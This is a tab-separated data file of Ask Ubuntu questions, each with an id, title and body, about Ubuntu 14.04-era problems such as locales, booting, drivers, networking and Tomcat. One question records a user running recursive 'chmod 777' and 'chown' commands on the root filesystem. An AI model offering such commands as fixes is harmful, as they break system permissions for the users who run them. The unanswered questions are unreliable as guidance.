475541	14.04 default locales	after a new install of 14.04 i have quite a few extra locales/languages . is this normal ? i installed using english ( gb ) i think since en_au is n't an option . at some point apt offered a list of unused files which i removed . now when i open language support it warns me that `` language support is not installed completely '' and offers to reinstall this list ... kde-l10n-zhcn thunderbird-locale-en-gb thunderbird-locale-es libreoffice-l10n-en-gb libreoffice-help-es libreoffice-help-en-gb wspanish thunderbird-locale-zh-cn myspell-es ibus-sunpinyin mythes-en-au kde-l10n-es libreoffice-l10n-zh-cn fonts-arphic-uming ibus-table-wubi thunderbird-locale-es-es thunderbird-locale-zh-hans libreoffice-l10n-en-za thunderbird-locale-es-ar hunspell-en-ca libreoffice-l10n-es libreoffice-help-zh-cn kde-l10n-engb fonts-arphic-ukai so are spanish and chinese installed by default in all installations now ? why do i need canadian english spellchecking installed ?
475547	sdl libraries are missing	~/vidmodel/wvsn-model-omnetpp-v4/geometry/triangle.o ~/vidmodel/wvsn-model-omnetpp-v4/geometry/polygon.o ~/vidmodel/wvsn-model-omnetpp-v4/geometry/triangulation.o -wl , -- no-as-needed -wl , -- whole-archive -lsdl -lpng -ljpeg -lz -lsdl_image -wl , -- no-whole-archive -l '' /home/sreeram/omnetpp-4.2.2/lib/gcc '' -l '' /home/sreeram/omnetpp-4.2.2/lib '' -loppmain -u _cmdenv_lib -wl , -- no-as-needed -loppcmdenv -loppenvir -loppsim -ldl -lstdc++ /usr/bin/ld : can not find -lsdl /usr/bin/ld : can not find -lpng /usr/bin/ld : can not find -ljpeg /usr/bin/ld : can not find -lsdl_image collect2 : ld returned 1 exit can any one please help me
475549	if i buy something on xubuntu software store can i download later across my account ?	if i buy on xubuntu software center ( laptop ) can i use on my ubuntu desktop ? also will i have to purchase again . ( same account )
475558	program/keyboard shortcut to work with multiple monitors	so i have a desktop with one dvi monitor and dp to hdmi monitor . my question is is there any keyboard shortcut or programs for multiple monitors ? my example is windows 7/8 and displayfusion . in windows 7/8 when you press start with left/right , it will cycle through all the monitors . in 14.04 , ctrl+super with left/right , in only does it for one monitor . it doesnt go to the other monitor , so i have to drag it to the other monitor first before snapping it to left/right side . in windows using displayfusion , pressing certain keboard shortcut will transfer one 'window ' to another monitor . in ubuntu , i did not found any . in a way , windows 7/8 plus displayfusion makes working multiple monitors really easy using keyboard shortcut . correct me if i 'm wrong , but i have not able to find anything that can match my example in ubuntu or linux . almost all of the pages i go through using google shows me how to setup multiple monitors . so i was wondering , with the release of 14.04 , is there anything that i should know about working with switching/snapping/transferring 'window/program ' with multiple monitors . i know keyboard binding might work , but i absolutely have no idea what to bind to . maybe there is program somewhere out there that i did n't manage to find . maybe a script in transferring window from one monitor to another monitor . its nice to see when you use multiple workspace , you can easily transfer application to other workspace , but multiple monitors , not so much .
475563	why does n't unity show icons or panel after installing numix theme ?	i 'm a beginner to ubuntu/linux and i have a problem : unity is not loading ! when i choose unity in the log-in screen , i get notifications and i can see the mouse , but that 's it . i have ubuntu 14.04 installed , along with bumblebee/primus . i had no issues whatsoever , until i decided to try the numix-theme and the numix icon pack . i added the ppa and installed it , but when i logged off and logged back on , nothing showed up . i panicked , and in tty1 , i purged numix-* but that did not solve the issue . to get by day-to-day use , i installed gnome-flashback , and among those environments , only the metacity one works . ( the compiz one does not . ) i 've tried installing the unity-tweak-tool to reset unit , installing dconf and doing : dconf reset -f /org/compiz/ but that did n't work either . one site even told me to delete /org/compiz/ , but that did not resolve the issue . when i checked ccsm , the unity plugin had a check to it . i also tried with unity does n't load , no launcher , no dash appears , but it gets stuck on `` loading icons '' . any help will be awesome !
475564	how to stop tomcat7 in ubuntu ?	i have installed apache tomcat7 using the command apt-get . now whenever i start my system , tomcat is running . i want to stop the tomcat so that i can start it within eclipse . i tried stoping it with shutdown.sh command and i am getting the below error : admin @ admin-emachines-e727 : /usr/share/tomcat7/bin $ sudo /usr/share/tomcat7/bin/shutdown.sh using catalina_base : /usr/share/tomcat7 using catalina_home : /usr/share/tomcat7 using catalina_tmpdir : /usr/share/tomcat7/temp using jre_home : /usr using classpath : /usr/share/tomcat7/bin/bootstrap.jar : /usr/share/tomcat7/bin/tomcat-juli.jar jun 02 , 2014 9:37:59 am org.apache.catalina.startup.classloaderfactory validatefile warning : problem with directory [ /usr/share/tomcat7/common/classes ] , exists : [ false ] , isdirectory : [ false ] , canread : [ false ] jun 02 , 2014 9:37:59 am org.apache.catalina.startup.classloaderfactory validatefile warning : problem with directory [ /usr/share/tomcat7/common ] , exists : [ false ] , isdirectory : [ false ] , canread : [ false ] jun 02 , 2014 9:38:00 am org.apache.catalina.startup.classloaderfactory validatefile warning : problem with directory [ /usr/share/tomcat7/server/classes ] , exists : [ false ] , isdirectory : [ false ] , canread : [ false ] jun 02 , 2014 9:38:00 am org.apache.catalina.startup.classloaderfactory validatefile warning : problem with directory [ /usr/share/tomcat7/server ] , exists : [ false ] , isdirectory : [ false ] , canread : [ false ] jun 02 , 2014 9:38:00 am org.apache.catalina.startup.classloaderfactory validatefile warning : problem with directory [ /usr/share/tomcat7/shared/classes ] , exists : [ false ] , isdirectory : [ false ] , canread : [ false ] jun 02 , 2014 9:38:00 am org.apache.catalina.startup.classloaderfactory validatefile warning : problem with directory [ /usr/share/tomcat7/shared ] , exists : [ false ] , isdirectory : [ false ] , canread : [ false ] jun 02 , 2014 9:38:00 am org.apache.catalina.startup.catalina stopserver severe : catalina.stop : java.io.filenotfoundexception : /usr/share/tomcat7/conf/server.xml ( no such file or directory ) at java.io.fileinputstream.open ( native method ) at java.io.fileinputstream. < init > ( fileinputstream.java:146 ) at org.apache.catalina.startup.catalina.stopserver ( catalina.java:468 ) at sun.reflect.nativemethodaccessorimpl.invoke0 ( native method ) at sun.reflect.nativemethodaccessorimpl.invoke ( nativemethodaccessorimpl.java:57 ) at sun.reflect.delegatingmethodaccessorimpl.invoke ( delegatingmethodaccessorimpl.java:43 ) at java.lang.reflect.method.invoke ( method.java:606 ) at org.apache.catalina.startup.bootstrap.stopserver ( bootstrap.java:371 ) at org.apache.catalina.startup.bootstrap.main ( bootstrap.java:458 ) please suggest me a solution for this issue . thanks in advance .
475572	ubuntu 14.04 wireless wo n't connect , then networkmanager disappeared	logged onto my computer , tried to connect to the internet and would not connect , kept saying you 've been disconnected after a 90 second timeout . so i went to network manager and when i tried to use it i got `` the system network services are not compatible with this version '' . so we move to terminal -- type in : nmcli get response of `` the program nmcli is currently not installed . you can install it by typing in ... .. '' so then try to boot from ubuntu drive . recognizes that their is linksys router but still times out trying to connect . whereas people next to me are connecting no problem . after rebooting to hard drive i open terminal and reset : sudo sed -i '/auto lo/ , +2 ! d' then go to check with cat /etc/network/interfaces and get response `` auto lo iface lo inet loopback '' and that is as far as i 've gotten . any hell is appreciated as i do not have a ethernet cable to connect to and am currently stuck with using my phone ...
475573	no wi-fi icon/ option in ubuntu 14.04	after installing ubuntu 14.04 the wifi icon and option just disappeared . i have tried to reboot it and searching the settings for it , but it does not let me connect to a wifi connection in any way . the only way to connect to the internet is with a wired connection . so how can i fix this and is this a bug or something that has to do with the version ? i installed it on a dell inspiron 910 mini netbook .
475577	unable to install ubuntu 14.0 alongside windows 8.1 in lenovo g580	every one i have lenovo g580 laptop which came without any operating system then i installed windows 8.1 and now trying to install ubuntu 14.04 along side but the option in the ubuntu installation does not shows windows 8.1 installed instead it suggests to install erase everything and install ... please give me suggestions how to install ubuntu alongside windows 8.1 thank you.. waiting for the suggestion .
475578	how to prevent form ddos attack	here i have problem in my ubuntu server its got attacked by some hackers last week so now i downed the server so any one please help me how to prevent from d dos attack in my ubuntu server.thanks in advance any help is really appreciated .
475580	is it good to install ubuntu and windows on lenovo g510 ?	i recently bought lenovo g510 ( i5,8gb ram ) how to install windows and ubuntu on this without having any crash of os .
475584	cache size of firefox ?	how do i go about to increase the cache size of firefox ? firefox crashes occasionally when i have four windows open with multiple tabs .
475585	how to set environmental variables for luasocket in ubuntu ?	i have installed the luasocket ( luasocket-2.0.2.tar.gz ) using this manual . but while performing the commands to require function to gain access to whatever module you need as below : socket = require ( `` socket '' ) print ( socket._version ) i get the following errors . stack traceback : [ c ] : in function `require' soc.lua:1 : in main chunk [ c ] : ? so how to set the environmental variables for this ? anyone please help me to find it out .
475586	creating and configuring an ubuntu .vdi image	i have taken some courses that provide a .vdi file for virtual box so that students do n't have to configure their own machines . how can i create one of these images with ubuntu on it ? what is the best way to configure it ? should i use some tool like vagrant , chef , or puppet ( i have n't used any of these so i do n't know exactly what they are for ) ?
475593	how to update java version to 7 or 8 using the ppa link ?	i have already tried to : re-install ca certificates run : sudo -e apt-add-repository add repository links to the etc/apt/sources.list manually . none of the above worked . i am trying to run igv browser in my system ( ubuntu 14.04 trusty tahr ) . kindly help .
475595	different wallpaper in workspace 14.04	i 've been trying to get the different picture in each workspace in ubuntu 14.04 . i 've tried a lot of things that i could find on this website and just google in general , but it does not seems to work . any help would be great !
475596	a boot/loading problem after installing ubuntu 14.04	i have recently installed ubuntu 14.04 onto my machine ( lenovo ideapad z510 ) . i face the same problem each time i open my pc which i describe in the following steps : 1 . i click the power on button and the screen lights with the word lenovo ( normal ) . 2 . nothing happens ! ( the screen displays nothing after that , but it is not powered off ) . to escape from this situation : 3 . i force my pc to shutdown ( hold the turn on/off button for 8 sec ) , then 4 . i power on again and everything goes normally and i can then use my computer . so , why i need to power on my pc twice ?
475599	why does `` hostname -d '' gives different output than domainname ?	i have joined an ubuntu 14.04 machine to domain using samba 4 but auth is not working . look what i get : # net ads keytab create -u 'admin' enter admin 's password : ads_get_dnshostname : no dnshostname attribute ! ../source3/libads/kerberos_keytab.c:328 : unable to determine machine account 's dns name in ad ! testing if my fqdn is correct i get : # hostname -d dom.forest.int # domainname ( none ) why does domainname has different behavior than hostname -d ? could this be the problem with samba ? this is my configuration : # grep mypcname /etc/hosts 127.0.1.1 mypcname.dom.forest.int mypcname and this : # cat /etc/hostname mypcname is my configuration correct ? how can i troubleshoot this further ?
475600	cant download from ubuntu software centre	i cant download anything from ubuntu software center , it hangs on updating cache then its telling me `` failed to download repository information '' . linux i understand suppose to be a straight forward os with no hiccups , but lately its been giving me headaches and i just only installed it 5 days ago . i looked up similar problems but nothing comes close to fixing it . any suggestions or fixes ?
475602	unable to mount and hdd information	i know this is a silly question . i got a 2.5 '' hard disk drive that i use for my laptop . it has problems , so i plugged it out and attached it into a hard disk case and connected the hard disk to my computer using usb . when i hit the super key and write `` disks '' , the `` disks '' utility shows me the hard disk . it says : hard disk jmicron usb to ata/atapi bridge however , when i click onto it to show the mount point and etc , i ca n't see anything . it does n't tell me about the size and contents , but it says the device is /dev/sdc . in my first try , the disks utility told me that the size is 2.2tb - which is weird because it writes 500gb on the hard disk . after this , i google 'd and tried to find a way to mount this . i executed this command : sudo fdisk -l i could n't see the hard disk there , but since the disks utility told me it 's /dev/sdc , i tried mounting it like this : sudo mkdir /media/e_test sudo mount -t ntfs-3g /dev/sdc /media/e_test those did n't work , so i tried : sudo mount -t ntfs /dev/sdc /media/e_test did n't work either . and lastly , sudo mount -t vfat -o /dev/sdc /media/e_test and it did n't work either . how can i recover the files in this hard disk ? thank you very much .
475603	i ca n't access my root user	i am a new ubuntu user and i am using ubuntu 14.04 . when i try to change root permissions , i get some error reports . i have already tried sudo chown -r 777 / and sudo chmod -r 777 / . please help me if i am doing any mistakes . is there any command to access my root folder or root user ?
475605	try to install 64 bit version of lubuntu	i have an old pc with amd sempron 3000+ and a half gb of ram . i also have an old laptop with intel core 2 duo and 1gb of ram . if i am not wrong they are 64 bits version of processors . i try to run live cd of lubuntu 14.04 amd64 version and both : success . but when install it , both : failed . i used usb flash disk to run live cd . is there any explanations of these ? btw , i usually use 32 bits version . thanks..
475606	how to get a huawei e3276 usb modem detected/recognized on ubuntu 12.04	my huawei e3276 is not even detected on my system . what do i need to do ? root @ sm000243130045-hm : / # lsb_release -a ; uname -a ; lsusb no lsb modules are available . distributor id : ubuntu description : ubuntu 12.04.2 lts release : 12.04 codename : precise linux sm000243130045-hm 3.8.13-bone26 # 74 smp sat mar 22 02:27:23 pdt 2014 armv7l armv7l armv7l gnu/linux bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub root @ sm000243130045-hm : / # any help much appreciated . thanks
475609	upgraded software - dock is gone , can not use terminal	so , i have a huge problem . after installing some software updates , my dock is gone and my terminal is unusable - its the orange ( sometimes white ) block to the right in the screenshot . i have no ( ! ) clue , what to do . please help !
475610	panasonic cf-18 wo n't restart ( black screen )	i 've finally dumped windows xp on my sons cf-18 partly because he trashed it . now however after getting xubuntu to install and work quite well despite some issues with using it , i 'm finding that when i restart i get a black screen . i 've edited the grub config with as many options as i can find and still get the black screen . there 's a brief display of text which goes too fast for me to notice what it is but after this just black screen and no progress , requiring a forced shutdown with the power switch . doing this with windows xp is what killed it so i 'm glad that xubuntu seems more resilient as i have no hope of teaching an autistic 6 year old to shutdown properly .
475615	mount file system path as encrypted ?	i know how to mount an encrypted ext4 partition . however , now i want to do the opposite . i want to mount a folder of an existing partition somewhere else in my filesystem , but when accessing it , files should get encrypted using aes256 . is that possible ? here an example : i have a folder containing some images 1.jpg , 2.jpg , 3.jpg , etc . i want to mount this folder in another location so that the content of the images are encrypted . filenames should n't change . background : i want to synchronise my image folder to a cloud storage , but i want to encrypt the files before upload . the tools provided by the cloud provider do n't support client side encryption . therefore , i want to use the tools on a folder only containing encrypted data .
475617	do not mount partition on external disk	i have a sony ebook reader and when i connect it to the computer via usb two partitions get mounted . one of them is a read-only partition which is needed only the first time on windows . so every time i disconnect my reader i have to eject two partitions . it 's no big deal but it 's annoying . is there a way to tell ubuntu not to mount that specific partition ? i do not want to disable automount across the board .
475618	ca n't boot from usb or cd when installing ubuntu server	my old computer is running ubuntu server 12 , after it started to act weird , like not staying on and not letting me ssh to it , i decided to just make fresh install of ubuntu server 14.04 . but for some reason i ca n't boot from cd nor usb . i have checked that my usb is first boot device and cd is second , but no it always boots to grub , i even tried to disable booting from hdd but it still not boot from usb or cd it just did n't boot at all . with usb i tried to make it with universal usb installer and linuxlive usb creator , neither one did n't work . hope you guys have some ideas . i also posted this on /r/ubuntu . hope you do n't mind asking this question on multiple places .
475619	terminal commands	i have some questions about some terminal commands : why must you do sudo apt-get update before installing an program or after downloading something ? does it update ubuntu then ? what is the different between sudo gedit /location/to/afile.txt and gksu gedit /location/to/afile.txt ? why do n't people not use -y on the end of a command , like sudo apt-get install programx -y . what does the -i and -l ( are there any more ) mean in a terminal ? how can i unpack any .zip or .tar.gz file by terminal ?
475620	can exim be configured to send all emails externally ?	how do i configure exim4 to route all emails via a third-party smtp server when the sender 's domain , recipient 's domain , and server hostname all match ? i followed this great answer and have exim4 sending emails to addresses at other domains tested and working from an ubuntu server . my only issue is that emails where both the sender and recipient share the same domain as the server hostname , they never leave the server ( and this is the expected behavior ) . for example , sending from test @ example.com -- > test @ example2.com works fine , but sending from account1 @ example.com -- > account2 @ example.com just routes the mail locally to /var/mail/account2 , without passing through the third-party smtp server . i 'm using google apps at my own domain and want to send emails from server @ example.com to me @ example.com from a machine with the hostname example.com . i want to route them through google 's smtp server so i see them in my other email clients . is this possible ? very similar questions ( but for postfix ) here and here .
475621	14.04 ( dell pc ) unable to load some websites	i have ubuntu 14.04 . though internet works fine for windows 7 , in ubuntu i can not access certain sites as yahoo ( yahoo cricket , yahoo finance etc . works , but yahoo , yahoo mail does not ) , facebook , etc , but google works . i tried several measures reading on the net forums , like , scaling windows , changing mtu , changing dns to google dns etc , but nothing works . please help .
475622	14.04 fails to mount samsung galaxy note 3	13.10 mounted my note 3 just fine , but 14.04 simply does n't respond . i get a charging indicator when i plug in the usb cable , but no external mount .
475627	modify power / sleep setting via command line ssh	i want to change the power management sleep via ssh for a logged in user i set the value sudo -u user dbus-launch -- exit-with-session gsettings set org.gnome.settings-daemon.plugins.power sleep-inactive-ac-timeout 0 i get the value sudo -u user dbus-launch -- exit-with-session gsettings get org.gnome.settings-daemon.plugins.power sleep-inactive-ac-timeout 0 it seems to work , but it is n't because the past value still is considered by the system : ( note : if i open the gui it is applied actually , so it seems the system does n't consider this change via ssh
475630	how to get my serial port working in ubuntu 12.04	i have recently added some hardware ( which i am not aware is exactly what ) for 2 additional serial ports on my pc . the ports were added my pc my some service support group of my company , so i wo n't be able to give the details of the cards they inserted . all i am aware of at present is the following : my serial ports are not working with minicom , nor are they showing any garbage on minicom if i short their pin no . 2 and 3 i.e . rx and tx . output of setserial -g /dev/ttys* /dev/ttys0 , uart : 16550a , port : 0x03f8 , irq : 4 ... ... ... ... ... ... ... ... ... ... ... ... . ... ... ... ... ... ... ... ... ... ... ... ... . /dev/ttys4 , uart : 16550a , port : 0xe150 , irq : 19 /dev/ttys5 , uart : 16550a , port : 0xe140 , irq : 19 the first serial port is the default which came with my pc , is working . the ttys4 and ttys5 are the new one . from what i got from a number of posts on getting the serial ports to work on ubuntu , if the above output shows the uart : unknown , then you are in problem and you have to set it to proper uart type , after that it worked for everybody . i referred to the following articles : http : //www.placona.co.uk/359/linux/getting-serial-ports-to-work-on-linux/ http : //www.electronicsfaq.com/2010/02/getting-serial-port-to-work-under.html anybody has any clue how can i get them working ?
475632	brocken package for libavcodec54 & libx264-123 in ubuntu 14.04lts	$ sudo apt-get install -f [ sudo ] password for ajay : reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : libx264-123 the following new packages will be installed : libx264-123 0 upgraded , 1 newly installed , 0 to remove and 0 not upgraded . 2 not fully installed or removed . need to get 0 b/345 kb of archives . after this operation , 1,005 kb of additional disk space will be used . do you want to continue ? [ y/n ] y ( reading database ... 166965 files and directories currently installed . ) preparing to unpack ... /libx264-123_0.123.2189+git35cf912-1ubuntu4_amd64.deb ... unpacking libx264-123 : amd64 ( 2:0.123.2189+git35cf912-1ubuntu4 ) ... dpkg-deb ( subprocess ) : decompressing archive member : lzma error : compressed data is corrupt dpkg-deb : error : subprocess < decompress > returned error exit status 2 dpkg : error processing archive /var/cache/apt/archives/libx264-123_0.123.2189+git35cf912-1ubuntu4_amd64.deb ( -- unpack ) : can not copy extracted data for './usr/lib/x86_64-linux-gnu/libx264.so.123 ' to '/usr/lib/x86_64-linux-gnu/libx264.so.123.dpkg-new ' : unexpected end of file or stream errors were encountered while processing : /var/cache/apt/archives/libx264-123_0.123.2189+git35cf912-1ubuntu4_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 )
475635	laptop wo n't boot after i deleted ubuntu partition	i 'd installed an ubuntu distro alongside windows 8 that i did n't like . i was going to replace it with standard ubuntu , but it was having trouble , so i deleted the ubuntu partition from windows 8 . i was going to fix the mbr before rebooting , but it turned off . so anyway now i ca n't get past the grub rescue when i start the computer : error : unknown filesystem grub rescue > so i ca n't boot anything - hds , dvds , usbs . ls is one of the few commands that works and spits out : ( hd0 ) ( hd0 , msdos6 ) ( hd , msdos5 ) ( hds0 , msdos2 ) ( hd0 , msdos1 ) ( hd1 ) ( hd1 , msdos1 ) hd1 is a usb i have plugged in ( ubuntu live ) . i 've tried : set root= ( hd0 , msdos6 ) set prefix= ( hd0 , msdos6 ) /boot/grub insmod normal normal i never get to normal though . when i put in insmod normal , i get `` error : unknown file system . '' i 'm assuming msdos6 is the boot partition ( primary ) , msdos5 is win8 ( primary ) , msdos2 is was the logical extension with ubuntu which i cleared , and msdos1 is the linux swap . i guess it could be the other way around though . either way , insmod normal does n't work because it does n't recognize the file system . when others have asked this question on yahoo answers , most people have suggested booting a cd/dvd/usb , but that does n't work . i ca n't boot . is there any way i can boot from here to fix my mbr ?
475639	ubuntu is booting on acer e1-510 laptop , but screen displays nothing	tried loading ubuntu 12.04 ( 32-bit as well 64 bit ) through bootable usb , on a brand new 64-bit acer e1-510 laptop . it shows the 'try ubuntu without installing screen ' and i selected that option . but instead of showing ubuntu 's logo ( which implies it is loading ) . i get a blank screen . the screen is on , but it shows nothing . i tried the same on an old model laptop acer aspire 5738 and it worked like a charm . however , i realized that ubuntu is actually booting on e1-510 and only the display is not working . how did i arrive at this conclusion ? when i select on 'try ubuntu without installing screen ' , after about 8-10 seconds i see that the wifi indicator light on the laptop panel switches on ( just like when we boot up a windows os or even ubuntu ) . i got an idea that the system booted ubuntu . to confirm this , i tried to adjust volume using keyboard shortcuts . voila , i can hear the sound of adjusting volume ! that means it has already booted ubuntu . i confirmed this with another step . i pressed the power button once and after two seconds i pressed enter . it began the process of switching off and within 5 seconds the laptop was powered off . you may ask , why is this a confirmation that ubuntu has booted ? this is because in ubuntu when you press on power button , a dialog box opens with shut down , restart , suspend option- and the shut down option is already selected by default ; so all i have to do is press enter to shut down . this again proved that ubuntu was indeed up and running . unlike previous 'askubunutu ' posts about acer e1-510 , i must mention that my laptop came with the legacy bios mode , so its not really a problem to boot ubuntu from a bootable pendrive . only the screen is not working . in case you need to know , i am running windows 7-ultimate 64 bit on acer e1-510 .
475640	receiving `` command not found '' error messages after fresh reinstall of lubuntu 14.04	lubuntu 14.04 was working really great . . .until i messed up and had to do a complete fresh reinstall . now i receive error messages when i input commands into the terminal , even after immediately completing the fresh install . for example i type : sudo leafpad ‬/etc/default/ or sudo leafpad ‬/etc/default/grub i get : sudo : leafpad : command not found i type : sudo update-initramfs ‬-u or sudo update-grub i get : sudo : update-initramfs : command not found or sudo : update-grub : command not found if i use the command mkdir i get : mkdir : command not found i also get this same exact error message , command not found , with sudo apt-get and wget in other words i ca n't do anything that i was able to do when inputting commands into the terminal . so i can not add any repositories or update anything at all . i am not really sure what is causing the problem ( s ) . it appeared to me that lubuntu installed and booted up ok . however just as soon as i enter anything into the terminal i immediately get the above error messages . i have tried to do the reinstall three times , same error messages . if anyone can suggest any fixes i would really appreciate it very much . thank you !
475643	error while installing gnome in ubuntu 14.04	i have tried installing gnome from repositories i.e . from ubuntu software centre but it shows this error while installing currently i am having amd graphic card gallium 0.4 on amd rs780 so can it support gnome complexities
475644	ubuntu 14.04 install fails with via s3 unichrome pro graphics	i am trying to install ubuntu 14.04 on a fujitsu siemens amilo pro laptop ( it 's quite old yes , has about 30gb hard drive and i think 192mb of ram ) which currently has windows xp installed ( which i 'd like to keep for the time being ) . i have downloaded the 32-bit desktop iso and used unetbootin to create a live usb for this laptop . when i boot from usb , i arrive at the unetbootin grey and blue menu and pick either `` try ubuntu without installing '' , or `` install ubuntu '' . the menu goes away and an ubuntu loadscreen showing ubuntu and four dots which progressively change between white and orange . at about the second color changing cycle a white underscore symbol appears next to the fourth dot and flickers . there is some leftover text from the kernel boot still visible , but there is no graphical desktop . after this i have to hard reboot or shut-down . $ lshw -c video *-display unclaimed description : vga compatible controller product : cn700/p4m800 pro/p4m800 ce/vn800 graphics [ s3 unichrome pro ] vendor : via technologies , inc. physical id : 0 bus info : pci @ 0000:01:00.0 version : 01 width : 32 bits clock : 66mhz capabilities : pm agp agp-2.0 vga_controller bus_master cap_list configuration : latency=64 mingnt=2 resources : memory : f0000000-f3ffffff memory : d1000000-d1ffffff
475645	nfs-kernel-server installation : file does not exist	i am extremely new to ubuntu and need to work on edx platform . i need to install the nfs client on ubuntu 12.04 for the same . i used the following stuti @ stuti : / $ sudo apt-get install nfs-kernel-server however this gives me an error as follows : reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : nfs-common the following new packages will be installed : nfs-common nfs-kernel-server 0 upgraded , 2 newly installed , 0 to remove and 0 not upgraded . need to get 0 b/355 kb of archives . after this operation , 1,222 kb of additional disk space will be used . do you want to continue [ y/n ] ? y selecting previously unselected package nfs-common . ( reading database ... 200367 files and directories currently installed . ) unpacking nfs-common ( from ... /nfs-common_1 % 3a1.2.5-3ubuntu3.1_i386.deb ) ... selecting previously unselected package nfs-kernel-server . unpacking nfs-kernel-server ( from ... /nfs-kernel-server_1 % 3a1.2.5-3ubuntu3.1_i386.deb ) ... processing triggers for ureadahead ... processing triggers for man-db ... setting up nfs-common ( 1:1.2.5-3ubuntu3.1 ) ... statd start/running , process 4574 gssd stop/pre-start , process 4603 idmapd start/running , process 4643 setting up nfs-kernel-server ( 1:1.2.5-3ubuntu3.1 ) ... update-rc.d : /etc/init.d/nfs-kernel-server : file does not exist dpkg : error processing nfs-kernel-server ( -- configure ) : subprocess installed post-installation script returned error exit status 1 no apport report written because maxreports is reached already errors were encountered while processing : nfs-kernel-server e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i have tried sudo apt-get autoremove nfs-kernel-server sudo apt-get autoremove nfs-common after these , i tried to install but i keep getting the same error . apt-get update or upgrade also do not help and give the same error . i am clueless as to where can i find this missing file as stated in the output . i tried to google about this problem but none of the solutions i came across have helped or i have not been able to understand some of them . any help would really be appreciated . thanks in advance for your time and attention .
475647	why is my gmail account showing up in triplicate on my evolution mail app	on my ubuntu 14.04 machine i am using evolution mail . i have various company imap addresses and one gmail account . my gmail account is showing in the left account list in triplicate for some reason and i am not sure why or what is causing this . how do i rectify this problem ?
475648	removing spell checker language versions	is there a way to reduce the spell checker language list from english english ( canada ) english ( united kingdom ) english ( united states ) swedish swedish ( sweden ) to just english swedish i find it annoying that i have to select among six entries when i only use two languages .
475650	how to integrate aria2 or wget with google chromium ?	as the title tells everything , can anyone tell me the way to integrate aria2 or wget with chromium . thanks
475651	how can i get bigger window buttons in unity ?	i am using ubuntu 14.04 with unity . i would like to have bigger window buttons ( close , maximize , minimize ) in unity ( theme ambiance or radiance ) . i am using ubuntu on a touchscreen with my fingers and it is not easy to always `` click '' on the right one . i do not want to use the display setting = > scale for menu and title bars since it also scales font and many other things . thanks
475653	virtual box does run 64-bit guests on 32-bit host ?	please how can i run 64-bit guests on 32-bit host ? i have oracle vm virtualbox 4.3.12 when i choose : i can only find 32 bit . my host cpu is intel ( r ) core ( tm ) 2 duo cpu t6600 @ 2.20ghz . from cat /proc/cpuinfo processor : flags : fpu vme de pse tsc msr pae mce cx8 apic mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 constant_tsc pni monitor ssse3 bogomips
475656	no shutdown , reboot in logout menu and no pid for lxde	i 've just had a clean install of lubuntu and on top of that i reinstalled packages from a relatively clean install with dpkg . but now i have two problems . first when i boot up i get the error `` no session for pid # # # # '' which is for /usr/bin/lxsession -s lubuntu -e lxde then the shutdown and reboot options have disappeared from the logout menu . update : while installing all the packages through dpkg there is a package that fails : /var/cache/apt/archives/libunity9_7.1.4+14.04.20140210-0ubuntu1_i386.deb and then the dpkg stops due to that error .
475659	is there a way to make catalyst driver work in trusty for the radeon hd4330 ?	though official catalyst software 13.1 is suitable for ati radeon hd4330 , it ca n't be installed on ubuntu 14.04 as it ca n't support xorg > = 7.6 as i need proprietary drivers for trusty , i would like to know if there is a way to bypass this limitation ? ( for example by fetching driver sources ) here are some results from the terminal : $ xorg -version x.org x server 1.15.1 release date : 2014-04-13 x protocol version 11 , revision 0 build operating system : linux 3.2.0-37-generic x86_64 ubuntu current operating system : linux bordeaux80 3.13.0-27-generic # 50-ubuntu smp thu may 15 18:06:16 utc 2014 x86_64 kernel command line : boot_image=/boot/vmlinuz-3.13.0-27-generic root=uuid=4015e6f7-d11a-45fd-ac9b-5b6c7ab9eaa0 ro quiet splash vt.handoff=7 build date : 16 april 2014 01:36:29pm xorg-server 2:1.15.1-0ubuntu2 ( for technical support please see http : //www.ubuntu.com/support ) current version of pixman : 0.30.2 before reporting problems , check http : //wiki.x.org to make sure that you have the latest version . $ xrandr screen 0 : minimum 320 x 200 , current 1366 x 768 , maximum 8192 x 8192 lvds connected primary 1366x768+0+0 ( normal left inverted right x axis y axis ) 353mm x 198mm 1366x768 60.0*+ 1280x720 59.9 1152x768 59.8 1024x768 59.9 800x600 59.9 848x480 59.7 720x480 59.7 640x480 59.4 vga-0 disconnected ( normal left inverted right x axis y axis ) hdmi-0 disconnected ( normal left inverted right x axis y axis ) $ uname -rp 3.13.0-27-generic x86_64 $ glxinfo | grep opengl opengl vendor string : x.org opengl renderer string : gallium 0.4 on amd rv710 opengl core profile version string : 3.1 ( core profile ) mesa 10.1.0 opengl core profile shading language version string : 1.40 opengl core profile context flags : ( none ) opengl core profile extensions : opengl version string : 3.0 mesa 10.1.0 opengl shading language version string : 1.30 opengl context flags : ( none ) opengl extensions : edit : indeed , i would like to use webgl inside chrome . but seems like free drivers miss functionalities . this is my chrome : //gpu settings : my chrome gpu settings at pastebin regards
475662	lexmark e240 printing issues	i have lexmark e240 laser printer . i have been using it with 12.04 ( 32bit ) for 2 years with no significant issues . since lexmark does not support this printer on linux , i used alternatives drivers that were suggested by the community , such as hp-lasterjet , e238 , generic ps , etc . they all worked fine , more or less . after upgrading to 14.04 ( 64bit fresh install ) i tried to configure the printer as before , but now i have problems . the test page is ok , but when printing , most of the times , the first page in the document will be printed very partially and in 300 % zoom . next page might be ok . if i turn off the printer and back on , the first page might be ok , but in the next print job , it will be broken again . i used all the above printer options . same results . i did not install the lexmark drivers since they are intended for 12.04 and the package manager report that it is in `` bad quality '' ( do n't know why ) . does anyone has any experience with this printer in 14.04 64bit ?
475663	updating cache not working	i 'm trying to install software , but the software center ( after adding the multiverse option ) sits stuck on querying software sources . it never goes any further and consequently wo n't let me install anything . i 'm not offline - internet connection works fine . does this just take a very long time or is it actually stuck ? it 's been more than 10 mins and that bar has n't changed . i 'm on a 10mbps line .
475664	speed up unity dash loading programs	each time i open dash for the first time since booting , it takes ages to load programs on it . i have to wait for like a minute or so and then programs appears . i have online stuffs disabled so its only offline stuffs . is there a way to speed things up ?
